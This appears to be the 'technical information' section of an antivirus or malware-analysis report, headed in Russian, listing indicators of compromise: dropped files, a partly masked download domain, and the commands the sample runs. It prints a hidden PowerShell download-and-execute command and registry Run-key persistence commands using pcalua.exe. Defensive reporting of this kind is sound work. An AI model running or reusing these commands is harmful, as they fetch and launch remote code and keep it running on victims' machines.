Техническая информация
- http://sm###scope.info/pics/ebyjon.exe как %appdata%\wins.exe
- installutil.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\wins.exe
- %TEMP%\c7ebace9-d4f3-4576-b8fe-2fe996e42813\fdf.dll
- %TEMP%\installutil.exe
- %APPDATA%\wint.exe
- %TEMP%\b35bc50e-fc56-4239-a7d0-bb79118b31c9\agiledotnetrt.dll
- %TEMP%\installutil.exe в %TEMP%\tmpg694.tmp
- http://sm###scope.info/pics/ebyjon.exe
- DNS ASK sm###scope.info
- '%APPDATA%\wins.exe'
- '%APPDATA%\wint.exe'
- '%TEMP%\installutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sm###scope.info/pics/ebyjon.exe','%APPDATA%\wins.exe');Start-Process '...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\wint.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\wint.exe"